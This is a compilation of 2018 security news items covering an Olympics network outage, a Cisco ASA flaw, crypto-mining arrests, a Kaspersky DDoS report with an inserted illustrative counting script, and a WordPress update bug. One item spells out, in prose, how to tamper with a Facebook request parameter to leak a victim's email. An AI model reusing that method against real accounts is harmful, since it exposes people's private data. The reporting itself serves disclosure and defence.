Internal internet and wifi systems crashed at about 7:15 pm (1015 GMT) on Friday and were still not back to normal at midday on Saturday, Games organizers said.

Cyber-security teams and experts from South Korea's defence ministry, plus four other ministries, formed part of a taskforce investigating the shutdown, they said, adding that it didn't affect the high-tech opening ceremony.

Kim Yo Jong, the sister of North Korean leader Kim Jong Un, South Korean President Moon Jae-in and US Vice-President Mike Pence were among the VIPs at Pyeongchang Olympic Stadium late on Friday.

The outage follows warnings of malware phishing attacks targeting organizations working at the Olympics, and allegations of cyberattacks from Russia -- which has denied any involvement.

North Korea has also been blamed for a series of cyber incidents including the WannaCry global ransomware attack, which infected 300,000 computers worldwide last May.

"We don't want to speculate because we're still trying to find out what the root source is," said Nancy Park, a spokeswoman for the Games organisers.

"We have some reports, we've been working all night trying to find out and working with our partners."

- WannaCry -

South Korea showed off its technical expertise with a dazzling gala opening ceremony on Friday which included state-of-the-art special effects and augmented reality to add extra impact for TV viewers.

While internet and wifi were affected across the Olympic site -- spread over two main venues in mountainous eastern South Korea -- organisers said there was no impact on competition, which got into full swing on Saturday.

"There were some issues that impacted some of our non-critical systems last night for a few hours," Games organizers said in a statement.

"These have not disrupted any events, or had any effect on the safety and security of any athletes or spectators," they added.

"All competitions are running as planned and the systems are working at the expected level."

Last month, cyber-security firm McAfee said it had uncovered an attack targeting organisations involved with the Olympics, using a malicious email attachment.

North Korea has been accused of involvement in a number of cyber incidents, including WannaCry -- although it has slammed that accusation as "absurd".

Russia has also denied launching any hacking attacks on the Pyeongchang Olympics, where its team is formally banned following the revelation of systemic doping.

While organizers wouldn't comment on the possibility that an attack was behind the shutdown, experts believe disrupting the Games would be seen as a coup for many hackers.

"The whole world’s watching. It's one of the largest stages you can possibly have to get a message out there," Ross Rustici, senior director for intelligence at Boston-based Cybereason, told the Tribune News Service.

"You got a lot of lower-tier guys going after these games. It's head-hunting, bragging rights," Rustici was quoted as saying.


Hackers are exploiting the CVE-2018-0101 CISCO ASA flaw in attacks in the wild
11.2.2018 securityaffairs Vulnerability

Hackers are exploiting the CVE-2018-0101 CISCO ASA flaw in attacks in the wild, and proof-of-concept exploit code is available online.
This week, Cisco has rolled out new security patches for a critical vulnerability, tracked as CVE-2018-0101, in its CISCO ASA (Adaptive Security Appliance) software.

This is the second time the tech giant has issued a security patch for the critical vulnerability in CISCO ASA; the first was released in January. The vulnerability could be exploited by a remote, unauthenticated attacker to execute arbitrary code or trigger a denial-of-service (DoS) condition that causes the system to reload.

The affected models are:

3000 Series Industrial Security Appliance (ISA)
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
ASA 1000V Cloud Firewall
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4110 Security Appliance
Firepower 9300 ASA Security Module
Firepower Threat Defense Software (FTD)

Now the company has confirmed that attackers are trying to exploit the vulnerability CVE-2018-0101 in attacks in the wild.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of public knowledge of the vulnerability that is described in this advisory,” reads the updated security advisory published by Cisco. “Cisco PSIRT is aware of attempted malicious use of the vulnerability described in this advisory.”

The vulnerability was discovered by Cedric Halbronn and received a CVSS base score of 10.0, the highest one.

This week Halbronn presented his findings at the REcon conference in Brussels in a talk titled ‘Robin Hood vs CISCO ASA Anyconnect.’ He noted that the vulnerability could be up to seven years old, because AnyConnect Host Scan has been available since 2011.

The new attack scenario covered by the updated advisory sees an attacker exploiting the vulnerability by sending specially crafted XML packets to a webvpn-configured interface.


A “Cisco ASA CVE-2018-0101 Crash PoC” has already been published by some users on Pastebin.


FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins
11.2.2018 securityaffairs CoinMine

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility on suspicion of trying to use a supercomputer at the plant to mine Bitcoin.
The record values reached by the main cryptocurrencies are attracting criminal organizations: the number of cyber-attacks against the sector continues to increase, and malware writers (VXers) are focusing their efforts on developing cryptocurrency-mining malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at Radiflow, a provider of cybersecurity solutions for critical infrastructure, discovered at a water utility the first documented case of a SCADA network infected with Monero cryptocurrency-mining malware.

“Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

Radiflow revealed that the cryptocurrency malware was designed to run in stealth mode on a target system and even to disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have a dramatic impact on ICS and SCADA systems because it increases resource consumption, affecting the response times of the systems used to control physical processes in those environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities and charged with mining cryptocurrency using “office computing resources.”

The nuclear research plant is located in Sarov; in 2011 the Russian Federation Nuclear Center deployed a new petaflop supercomputer there.

The scientists are accused of abusing the computing power of one of Russia’s most powerful supercomputers, located at the Federal Nuclear Center, to mine Bitcoins.


The supercomputer is normally isolated from the Internet; the researchers were discovered while attempting to connect it online, and the Federal Security Service (FSB) arrested them.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them.”


Online Auction Safety Tips for Buyers and Sellers
11.2.2018 securityaffairs Security

Buying or selling goods through online auctions is more popular than ever. What are the best practices for buyers and sellers to follow in an online auction?
Buying or selling goods through online auctions is more popular than ever. Today, there are a number of different auctions sites available where sellers can post new and used items for sale.

Buyers often flock to these marketplaces, largely because auction prices tend to be quite low. Additionally, buying through online auctions is a great way to find unique items or collectibles that you simply can’t buy through traditional retail stores.

The vast majority of transactions that take place through these sites go off without a hitch. Occasionally, however, problems do occur.

There are instances where unscrupulous buyers or sellers try to take advantage of other people on the auction site.

By following a few simple online auction safety tips, you can ensure that you don’t fall victim to a scam.

A good place to start is by familiarizing yourself with some of the common risks including the following:

Sellers sometimes try to scam buyers by failing to send out items after they have already been paid for. Buyers, on the other hand, sometimes take advantage of sellers by failing to pay for the item after the seller has already sent it to them or claiming that they never received the item in order to get a refund.
Hackers or online thieves can take control of your account if they get access to your password. Not only can they use your account to make purchases but they can also steal your identity.
Buyers or sellers can sometimes use the personal information that is exchanged during a sale to steal your identity. For instance, if you use a personal check to pay for an item, an unscrupulous seller may try to steal your identity based on the information printed on your check.
Sellers sometimes may try to sell you a knockoff or copy rather than the actual item you are interested in purchasing.
Phishing scams may try to get you to share your information by posing as the auction site or as your payment processor. In most cases, these scams are designed to try to gain access to your banking information or to your password so that the perpetrators can steal your identity.

Now that you have a better idea of all of the things that can go wrong when buying through an online auction, you can take steps to prepare yourself. A good place to start is by familiarizing yourself with how each auction site is set up. Before posting an item for sale or placing a bid, spend some time performing the following tasks:

Try to get a sense of how the auction site works by watching several items. Pay particular attention to what happens at the end of the auction to see if there is a lot of last-minute bidding. You can then put auction software to work for you on bidding and selling.
Familiarize yourself with the website’s Terms of Use. Make sure you have a clear understanding of the various fees that are charged to both sellers and buyers.
Additionally, find out what steps they take to help protect users in the event that something goes awry with a transaction. Make sure that you fully understand the site’s rules before buying or selling items through their platform.
Find out what forms of payment the website recommends. In most cases, the best option is to use a service like PayPal rather than relying on other payment methods. Personal checks, wire transfers, money orders, cash, and credit or debit cards can be risky for both buyers and sellers. Services such as PayPal provide protection against problems that are commonly experienced online.
Protect your identity when creating your profile. Avoid including personally identifiable information in your profile. Try to keep your screen name and user account as anonymous as possible.
Choose your password carefully. The last thing that you want is for someone to be able to guess your password or to break it easily using software tools. Make sure your password is a minimum of 10 characters long. Include upper and lowercase letters along with symbols and numbers. Avoid including personal information such as your birthdate, age, or name in your password. Additionally, choose a different password for every site that you are on. That way, even if hackers figure out your password on one site, they won’t be able to access your profiles on other sites.

Online auction – Before making a purchase or listing an item for sale, be sure to do careful research.

Start by taking a closer look at the reputation of the seller or buyer. Typically, the best option is to buy from sellers who have been selling through the platform for a long period of time and who have good feedback from buyers. Make sure all the transactions are completed through the auction site. Don’t fall for the scam where a seller tries to offer you a lower price if you buy the item from them directly rather than buying through the auction site.
Learn as much as you can about the item you are selling or buying. Find out how much the item is currently worth. Make sure that it is authentic and figure out what type of condition it is in. Buyers may want to consider saving a screenshot of the description so that they have proof that they can turn to if the item doesn’t live up to the seller’s promises.


Facebook Increases Bug Bounty Payout After Audit
10.2.2018 securityweek Social

Facebook decided to increase a researcher’s bug bounty payout after discovering that a bug he reported could lead to account takeover.

In September 2017, security researcher Josip Franjković discovered an issue with Facebook’s partners portal, which leaked users’ email addresses. The bug was discovered after one of the researcher’s sites was approved to participate in the Free Basics project by Facebook.

What the researcher discovered was a medium-high impact privacy bug where adding a new admin user would leak their email address in subsequent notification emails.

Basically, for a newly added admin, the notification emails contained the admin's primary Facebook email address in a parameter of one of the links, the security researcher discovered.

To reproduce the bug, one would simply head to the Settings section at https://partners.facebook.com/fbs/settings/, add a name, and enter an email they control in the email field.

Next, they should simply hit the “Add” button, intercept the POST request to /mobile/settings/requirements/save/, and modify the values [settings.users.userstablecontainer.user_id] GET parameter to the ID of the victim whose email they would like to reveal, then forward the request.

Thus, the email Facebook sends to the address the attacker controls contains the victim's primary email as part of an <a href> link, the security researcher found.

Franjković reported the discovery on September 30, 2017, and Facebook informed him a couple of days later that they fixed an account takeover vulnerability in their platform. The original privacy leak bug, however, was resolved only in late October, after the researcher informed the company the exploit would still work.

After requesting more information from Facebook, the researcher found that the bug he discovered could result in the leaking of login codes. One other parameter in the email link could “potentially be used to login to the user's account (with some restrictions),” the researcher explains.

The feature, however, wasn’t enabled for the researcher’s account, so he could not have noticed it in the first place.

“Thank you Facebook's security team for being (more than) fair - they could have awarded only the email leak bug, and I would never know this was an account takeover,” the researcher notes.

Facebook too has confirmed that, after analyzing the bug reported by Franjković internally, the security team discovered that it could potentially allow an attacker to gain access to another account.

“We did a complete review and we determined that there is no evidence that these tactics were used or that personal information was exposed,” a post by the Facebook Bug Bounty team reads.

Franjković confirmed in an email discussion with SecurityWeek that Facebook increased the paid bounty to reward him for the more important vulnerability. While he wouldn’t reveal the exact amount he received, he did say it was his biggest bounty to date.


Lenovo patches critical flaws that affect Broadcom’s chipsets in dozens of Lenovo ThinkPad models
10.2.2018 securityaffairs Vulnerability

According to a security advisory issued by Lenovo, two critical vulnerabilities in Broadcom chipsets affect at least 25 models of Lenovo ThinkPad.
The affected models are ThinkPad 10, ThinkPad L460, ThinkPad P50s, ThinkPad T460, ThinkPad T460p, ThinkPad T460s, ThinkPad T560, ThinkPad X260 and ThinkPad Yoga 260.

One of the flaws was discovered in June by Google, which publicly disclosed it in September. Google also published a proof-of-concept exploit for a Wi-Fi firmware vulnerability affecting Broadcom chipsets in iOS 10 and earlier.

The flaw, tracked as CVE-2017-11120, is a memory corruption vulnerability that could be exploited by attackers to execute code and establish a backdoor on a targeted device.

The flaw, initially reported as affecting specific Broadcom chipsets used in Apple iPhones, Apple TV, and Android devices, was patched in the same month.

The vulnerability, tracked as CVE-2017-11120, is a memory corruption issue; Apple addressed it in the security update released with iOS 11.

Now Lenovo warns of the presence of the flaw in two dozen ThinkPad models that use Broadcom’s BCM4356 Wireless LAN Driver for Windows 10.

The Broadcom Wi-Fi chipsets used by Lenovo ThinkPad devices are affected by the CVE-2017-11120 flaw and also by the CVE-2017-11121 vulnerability; both issues are rated as “critical” and received a CVSS score of 10.

“Broadcom has issued an advisory for certain Broadcom WiFi controllers used by many computer and device makers, which contain buffer overflow vulnerabilities on the adapter (not the system CPU),” reads the security advisory. “Broadcom initially did not plan to remediate these issues, but when the WPA2 KRACK issue also emerged, Broadcom combined both fixes in to a single set of driver updates. Lenovo received the first of these near the end of 2017, and continues releasing fixes as integration and testing is completed.”

The flaws can be exploited by remote attackers to execute arbitrary code on the adapter (not the system’s CPU) of the target system.

The CVE-2017-11121 vulnerability was also discovered by Google experts; it is a buffer overflow vulnerability caused by improper validation of Wi-Fi frames.

“Properly crafted malicious over-the-air Fast Transition frames can potentially trigger internal Wi-Fi firmware heap and/or stack overflows, leading to denial of service or other effects,” reads the description for the flaw.

Lenovo urges users to update the Wi-Fi driver on affected ThinkPad models.


fail0verflow hackers found an unpatchable flaw in the Nintendo Switch bootROM and ran Linux on the console
10.2.2018 securityaffairs Hacking

The group of hackers known as ‘fail0verflow’ has discovered a vulnerability in the gaming console Nintendo Switch that could be exploited to install a Linux distro.
The hackers announced their discovery in a post on Twitter; they published an image of a console running the Debian Linux distro after the hack.


fail0verflow
@fail0verflow
🐧🐧🐧🐧 #switch

4:16 PM - Feb 6, 2018
The fail0verflow group revealed that the exploit triggers a flaw in the boot ROM of the Nvidia Tegra X1 chip that powers the console; if confirmed, the issue cannot be fixed with a software or firmware update.

When asked whether they had built the hack on nvtboot, the group replied that no closed-source boot chain components were involved.

The discovery of a flaw in the boot ROM opens the door to hacking the console for other purposes, for example piracy.


In the near future, hackers could find a way to install homebrew apps and pirated games on the Nintendo Switch.

On the other side, Nintendo could work with Nvidia on new, secure Tegra X1 chips; as a temporary measure, it could ban users with hacked consoles from online play.


VMware releases temporary mitigations for Meltdown and Spectre flaws
10.2.2018 securityaffairs
Vulnerability

VMware has provided detailed instruction on how to mitigate the Meltdown and Spectre vulnerabilities in several of its products.
VMware is releasing patches and workarounds for its Virtual Appliance products affected by the Meltdown and Spectre vulnerabilities.

The Meltdown and Spectre attacks can be exploited by attackers to bypass memory isolation mechanisms and access sensitive data on the target.

The mitigation measures can be applied to vCloud Usage Meter, Identity Manager (vIDM), vCenter Server, vSphere Data Protection, vSphere Integrated Containers and vRealize Automation (vRA).

“VMware Virtual Appliance updates address side-channel analysis due to speculative execution” states the advisory published by the company.

The company acknowledged problems for its virtual appliances and opted to release workarounds to protect its customers. The proposed workarounds are only temporary; permanent fixes will be released as soon as they are available.

The complete list of workarounds is available here. In some cases, admins can mitigate the issue by running a few commands as a privileged user; in other cases, the procedure to deploy the mitigations is more complex.


DDoS attacks in Q4 2017
10.2.2018 Kaspersky Analysis
Attack

News overview
In terms of news about DDoS attacks, the last quarter of 2017 was livelier than the previous one. Some major botnets were discovered and destroyed. For instance, early December saw the FBI, Microsoft, and Europol team up to knock out the Andromeda botnet, in operation since 2011. In late October, the Indian Computer Emergency Response Team (CERT) issued a warning about a massive botnet being assembled by a hacker group using the Reaper and IoTroop malware; earlier that same month, the spread of Sockbot through infected Google Play apps was detected and terminated.

Besides the various battles with Trojan-infested botnets, the last three months of 2017 were dominated by three main DDoS trends: politically motivated attacks, attempts to cash in on the soaring price of Bitcoin, and tougher law enforcement.

Politically motivated DDoS attacks remain eye-catching, but fairly ineffective. In late October again, during parliamentary elections in the Czech Republic, the country’s statistical office was hit by a DDoS attack in the middle of the vote count. The attack was a nuisance, but nothing more, and the results of the elections were duly announced on time.

Another DDoS-based political protest was aimed at the Spanish government in connection with the Catalan question. Hacktivists from the Anonymous group managed to take down the website of Spain’s Constitutional Court, and defaced the Ministry of Public Works and Transport’s website with the message “Free Catalonia.”

But politics is politics, and business is, well, just that. As we noted in the previous quarter, Bitcoin and everything associated with it has hit peak commercial popularity — not surprising, considering the explosive growth in its value. No sooner had Bitcoin spawned a new kind of cryptocurrency in the shape of Bitcoin Gold (BTG) than BTG sites immediately came under DDoS fire. After the price of the cryptocurrency took off in November, DDoS attacks rained down on the Bitfinex exchange — apparently with the aim of profiting from Bitcoin price fluctuations caused by denial of service. Still punch-drunk from the November attack, Bitfinex was paralyzed by two more onslaughts in early December.

On the topic of total failure, it would be amiss not to mention the shutdown of four shadow markets in the deep web used for all kinds of illegal trade: Trade Route, Tochka, Wall Street Market, and Dream Market. They have been operating erratically ever since October. It wasn’t clear at first what was behind these massive, well-coordinated attacks: the law enforcement agencies (as in the recent destruction of AlphaBay and Hansa) or competitors attempting to encroach on their territory. The subsequent attacks on all other trading platforms in early December dispelled most analysts’ doubts that it was a full-scale cyberwar between drug cartels.

However, the law — in particular, the judicial system — is not sitting idly by. Q4 saw a whole host of charges and sentences handed down in DDoS-related cases. The US judicial system was the most active: in mid-December, three defendants, Paras Jha, Josiah White, and Dalton Norman, confessed to being the brains behind the Mirai botnet.

And in late December, the founders of the notorious hacker groups Lizard Squad and PoodleCorp — Zachary Buchta of the U.S. and Bradley Jan Willem van Rooy of the Netherlands — were convicted.

In Britain, the high-profile case of young hacker Alex Bessell from Liverpool went to trial. Bessell was recently jailed for having launched a series of major cyber attacks in the period 2011-2013 against such giants as Skype, Google, and Pokemon. An even younger British hacker who targeted NatWest Bank, the National Crime Agency, Vodafone, the BBC, and Amazon was handed 16 months’ detention, suspended for two years.

A curious incident concerned 46-year-old John Gammell of Minnesota, who was charged with hiring three hacking services to create problems for his former employers, the websites of the judicial system of the district where he lived, and several other companies where he was once a contractor. The sponsors of DDoS attacks are often hard to track down, but Gammell couldn’t resist the temptation to tease his targets with emails — which led to his capture. As the investigators reported, the hacking services dealt with Gammell very professionally and cordially, thanking him for procuring their services and even upgrading his membership.

Quarter trends
Q4 demonstrated that DDoS attacks can be categorized as persistent online “crosstalk.” Junk traffic has become so widespread that server failure from too many requests might not be attack-related, but the accidental result of botnet side activities. For instance, in December we logged a huge number of requests to non-existent 2nd and 3rd level domains, which created an abnormal load on DNS servers in the RU zone. A modification of the Lethic Trojan turned out to be the culprit. This long-known malware comes in many different flavors, its main task being to allow spam traffic to pass through infected devices, basically like a proxy server.

The version we discovered was unlike most modifications in that it operates in multiple threads to create a huge number of requests to non-existent domains. The study found that this behavior was an attempt to mask the command-and-control (C&C) server addresses behind numerous junk requests, and the excessive load on the DNS servers was simply the result of the malware’s poor design. Nevertheless, DDoS attacks on DNS servers using junk requests are quite common and easy to implement. Our experts have assisted clients in many such instances. What’s interesting here is the method employed, as well as the perhaps unintended effect.

Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of varying complexity, type and scale. Company experts track the actions of botnets using the DDoS Intelligence system.
Being part of the Kaspersky DDoS Prevention solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers and requires neither the infection of any user devices, nor the actual execution of cybercriminals’ commands.

This report contains DDoS Intelligence statistics for Q4 2017.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Also, bot requests originating from different botnets but directed at one resource count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited only to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools for performing DDoS attacks; thus, the data presented in this report do not cover every single DDoS attack that occurred during the specified period.
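The counting rule above (one botnet, one target, a gap of 24 hours or more splits the activity into two attacks; a second botnet hitting the same target is a separate attack; targets are unique IP addresses) can be applied mechanically to a list of observed C&C commands. The following is an added illustration of that rule, not code from Kaspersky Lab's DDoS Intelligence system; the sample commands, botnet names and target addresses are constructed, and the duration classes mirror the ones used in the report's charts.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample of C&C commands as a DDoS Intelligence-style collector might
# record them: (timestamp, botnet identifier, target IP). Every value is made up.
SAMPLE_COMMANDS = [
    ("2017-11-24 00:00", "botnet-A", "198.51.100.10"),
    ("2017-11-24 05:00", "botnet-A", "198.51.100.10"),
    ("2017-11-24 20:00", "botnet-A", "198.51.100.10"),
    ("2017-11-26 02:00", "botnet-A", "198.51.100.10"),  # 30 h after the last command: new attack
    ("2017-11-24 01:00", "botnet-B", "198.51.100.10"),  # same target, other botnet: separate attack
    ("2017-11-24 00:00", "botnet-A", "198.51.100.20"),
    ("2017-11-25 00:00", "botnet-A", "198.51.100.20"),  # exactly 24 h later: counts as a second attack
]

# A gap of 24 hours or more between commands of one botnet against one target
# splits the activity into two attacks (the report's counting rule).
SPLIT_GAP = timedelta(hours=24)


@dataclass
class Attack:
    botnet: str
    target: str
    start: datetime
    end: datetime

    @property
    def duration_hours(self) -> float:
        return (self.end - self.start).total_seconds() / 3600


def parse_commands(rows):
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M"), botnet, target)
            for ts, botnet, target in rows]


def group_attacks(rows):
    """Turn raw per-command observations into attack incidents."""
    stamps_by_pair = defaultdict(list)
    for ts, botnet, target in parse_commands(rows):
        stamps_by_pair[(botnet, target)].append(ts)

    attacks = []
    for (botnet, target), stamps in sorted(stamps_by_pair.items()):
        stamps.sort()
        current = Attack(botnet, target, stamps[0], stamps[0])
        for ts in stamps[1:]:
            if ts - current.end >= SPLIT_GAP:
                attacks.append(current)
                current = Attack(botnet, target, ts, ts)
            else:
                current.end = ts
        attacks.append(current)
    return attacks


def unique_targets(attacks):
    # The report counts targets as unique IP addresses.
    return len({a.target for a in attacks})


def longest_attack_hours(attacks):
    return max(a.duration_hours for a in attacks)


# Duration classes used in the report's distribution chart (upper bound in hours).
DURATION_CLASSES = [(4, "<=4"), (9, "5-9"), (19, "10-19"), (49, "20-49"),
                    (99, "50-99"), (139, "100-139"), (float("inf"), ">=140")]


def duration_class(hours):
    for upper, label in DURATION_CLASSES:
        if hours <= upper:
            return label


def duration_distribution(attacks):
    """Share (percent) of attacks per duration class, like the report's figure."""
    counts = Counter(duration_class(a.duration_hours) for a in attacks)
    total = len(attacks)
    return {label: round(100 * counts[label] / total, 2)
            for _, label in DURATION_CLASSES if counts[label]}


if __name__ == "__main__":
    attacks = group_attacks(SAMPLE_COMMANDS)
    print(f"{len(attacks)} attacks on {unique_targets(attacks)} unique targets")
    print(f"longest attack: {longest_attack_hours(attacks):.0f} h")
    print(duration_distribution(attacks))
```

On the constructed sample this yields five attacks against two unique targets, which shows why the number of attacks and the number of targets in the report can diverge so widely: repeated and multi-botnet activity against one address inflates the former but not the latter.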

Quarter results
In Q4 2017, DDoS attacks were registered against targets in 84 countries (98 in Q3). However, as in the previous quarter, the overwhelming majority of attacks occurred in the top ten countries in the list (94.48% vs. 93.56%).
More than half of all attacks in Q4 (51.84%) were aimed at targets in China — almost unchanged since Q3 (51.56%).
In terms of both number of attacks and number of targets, South Korea, China, and the US remain out in front. But in terms of number of botnet C&C servers, Russia pulled alongside this trio: its relative share matched China’s.
The longest DDoS attack of Q4 2017 lasted 146 hours (just over six days). This is significantly shorter than the previous quarter’s record of 215 hours (almost nine days). 2017’s longest attack (277 hours) was registered in Q2.
The days before and after Black Friday and Cyber Monday saw increased activity on dummy Linux servers (honeypot traps), which lasted right up until the beginning of December.
SYN DDoS remains the most common attack method, while the least popular is ICMP DDoS. According to Kaspersky DDoS Protection data, the frequency of multi-method attacks rose.
In Q4 2017, the share of Linux botnets climbed slightly to 71.19% of all attacks.
Geography of attacks
In Q4 2017, DDoS attacks affected 84 countries, which represents a slight improvement over the previous quarter, when 98 countries were hit. Traditionally, China is most in the firing line, although the country’s share of attacks decreased slightly (from 63.30% to 59.18%), approaching the Q2 level. The figures for the US and South Korea, which retained second and third place, went up slightly to 16.00% and 10.21%, respectively.

Fourth place went to Britain (2.70%), which climbed 1.4% to overtake Russia. Although Russia’s share of attacks dropped insignificantly (by 0.3%), that was enough to push it into sixth place behind Vietnam (1.26%), which made a return to the leaderboard, squeezing Hong Kong out of the top ten.

The percentage of attacks directed against targets in the top ten countries grew in the last quarter (but not by much) to almost 92.90% vs. 91.27% in Q3 2017. The landscape is much the same as before.

About half of all targets are still in China (51.84%), followed by the US (19.32%), where the number of targets is again nearing 20% after a slight dip in Q3; South Korea is third with 10.37%. Vietnam again ousted Hong Kong from the top ten, taking ninth place with a 1.13% share, while Russia (1.21%) came seventh with a loss of 1%, making way for Britain (3.93%), France (1.60%), Canada (1.24%), and the Netherlands (1.22%), whose figures did not change much against the previous quarter.

Dynamics of the number of DDoS attacks
Statistical analysis of specially prepared Linux servers — so-called honeypot traps — shows that peak botnet activity this quarter occurred during the pre- and post-holiday sales. Feverish cybercriminal activity was clearly observed around Black Friday and Cyber Monday, dying down by the second third of December.

The most significant peaks occurred on November 24 and 29, when the number of individual IPs storming our resources doubled. Some increase in activity was also observed in late October — most likely Halloween-related.

Such fluctuations point to attempts by cybercriminals to boost their botnets in the run-up to major sales. Pre-holiday periods are incubators of cybercriminal growth for two reasons: first, users are less discerning and more likely to “surrender” their devices to intruders; second, the prospect of a fast buck makes it possible to blackmail Internet companies with lost profits or to offer one’s services in the cut-throat struggle online.

Dynamics of the number of Linux-based attacks in Q4 2017*
*Shows changes in the number of unique IPs per 24 hours

Types and duration of DDoS attacks
In Q4, the share of SYN DDoS attacks decreased (from 60.43% to 55.63%) due to less activity by the Linux-based Xor DDoS botnet. These attacks still rank first, however. The percentage of ICMP attacks (3.37%), still the least common, also fell. The relative frequency of other types of attacks increased, but whereas in the previous quarter TCP attacks ranked second after SYN, UDP overshadowed both these types, rising from second-to-last to second-from-top (in Q4 UDP DDoS accounted for 15.24% of all attacks).

Kaspersky DDoS Protection annual statistics show a decline in the popularity of DDoS attacks involving only pure HTTP and HTTPS flooding. The frequency of multi-method attacks rose accordingly. Nevertheless, one in three mixed attacks contained an HTTP or HTTPS flood. This may be due to the fact that HTTP(S) attacks are quite expensive and complex, while in a mixed attack they can be used by cybercriminals to increase the overall effectiveness without additional costs.

Correlation between attack types according to Kaspersky DDoS Protection, 2016 and 2017

The longest attack in Q4 was significantly shorter than its Q3 counterpart: 146 hours (about 6 days) vs. 215 (about 9). That’s barely half the Q2 and 2017 record of 277 hours. Overall, the share of longish attacks continues to decline, albeit insignificantly. This also applies to attacks lasting 100-139 hours and 50-99 hours (the shares of these categories are so small that even a change of 0.01% is news). The most common are still micro-attacks, lasting no more than four hours: their share rose slightly to 76.76% (vs. 76.09% in Q3). Also up was the proportion of attacks lasting 10-49 hours, but again not by much — about 1.5%.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2017

C&C servers and botnet types
The top three countries by number of C&C servers remained as before: South Korea (46.63%), the US (17.26%), China (5.95%). Although the figures for the latter two climbed slightly against Q3, China had to share third place with Russia, which gained 2%. While the leaders’ shares changed insignificantly in percentage terms, in absolute terms the number of C&C servers detected in all three countries almost halved. This is at least partially due to the termination of many Nitol botnet admin servers and the less active Xor botnet. On a separate note, this category’s top ten welcomed Canada, Turkey, and Lithuania (1.19% each), while Italy, Hong Kong, and Britain departed the list.

Distribution of botnet C&C servers by country, Q4 2017

The steady increase in the number of Linux-based botnets continued this quarter: their share now stands at 71.19% against Q3’s 69.62%. Accordingly, the share of Windows-based botnets fell from 30.38% to 28.81%.

Correlation between Windows- and Linux-based botnet attacks, Q4 2017

Conclusion
Q4 2017 represented something of a lull: both the number and duration of DDoS attacks were down against the previous quarter. The final three months of 2017 were even calmer than the first three. Alongside the rising number of multicomponent attacks involving various combinations of SYN, TCP Connect, HTTP flooding, and UDP flooding techniques, the emerging pattern suggests a backsliding for DDoS botnets in general. Perhaps the economic climate or tougher law enforcement has made it harder to maintain large botnets, causing their operators to switch tactics and start combining components from a range of botnets.

At the same time, the increase in the number of attacks on honeypot traps in the run-up to holiday sales indicates that cybercriminals are keen to expand their botnets at the most opportune moment, looking to grab a slice of the pie by pressuring owners of online resources and preventing them from making a profit. In any event, the DDoS spikes around Black Friday and Cyber Monday were a salient feature of this quarter.

Another aspect of the late fall/early winter period was the continued attacks on cryptocurrency exchanges in line with the trends of the past months. Such fervor on the part of cybercriminals is not surprising given the explosive growth in the price of Bitcoin and Monero. Barring a collapse in the exchange rate (short-term fluctuations that only encourage speculators do not count), these exchanges are set to remain a prime target throughout 2018.

What’s more, the last quarter showed that not only are DDoS attacks a means to make financial or political gain, but can produce accidental side effects, as we saw last December with the junk traffic generated by the Lethic spam bot. Clearly, the Internet is now so saturated with digital noise that an arbitrary resource can be hit by botnet activity without being the target of the attack or representing any value whatsoever to the attackers.


WordPress Update Breaks Automatic Update Feature—Apply Manual Update
9.2.2018 thehackernews
Vulnerability
WordPress administrators are once again in trouble.
WordPress version 4.9.3 was released earlier this week with patches for a total of 34 vulnerabilities, but unfortunately, the new version broke the automatic update mechanism for millions of WordPress websites.
The WordPress team has now issued a new maintenance update, WordPress 4.9.4, to patch this severe bug, which WordPress admins have to install manually.


According to security firm WordFence, a PHP error interrupts the auto-update process when WordPress tries to determine whether an updated version is available and needs to be installed.
If not updated manually to the latest 4.9.4 version, the bug would leave your website on WordPress 4.9.3 forever, leaving it vulnerable to future security issues.
Here's what WordPress lead developer Dion Hulse explained about the bug:
"#43103-core aimed to reduce the number of API calls which get made when the auto-update cron task is run. Unfortunately, due to human error, the final commit didn't have the intended effect and instead triggers a fatal error as not all of the dependencies of find_core_auto_update() are met. For whatever reason, the fatal error was not discovered before 4.9.3's release—it was a few hours after release when discovered."
The issue has since been fixed, but as reported, the fix will not be installed automatically.


Thus, WordPress administrators are being urged to update to the latest WordPress release manually to make sure they'll be protected against future vulnerabilities.
To manually update their WordPress installations, admin users can sign into their WordPress website and visit Dashboard→Updates and then click "Update Now."
After the update, make sure that your core WordPress version is 4.9.4.
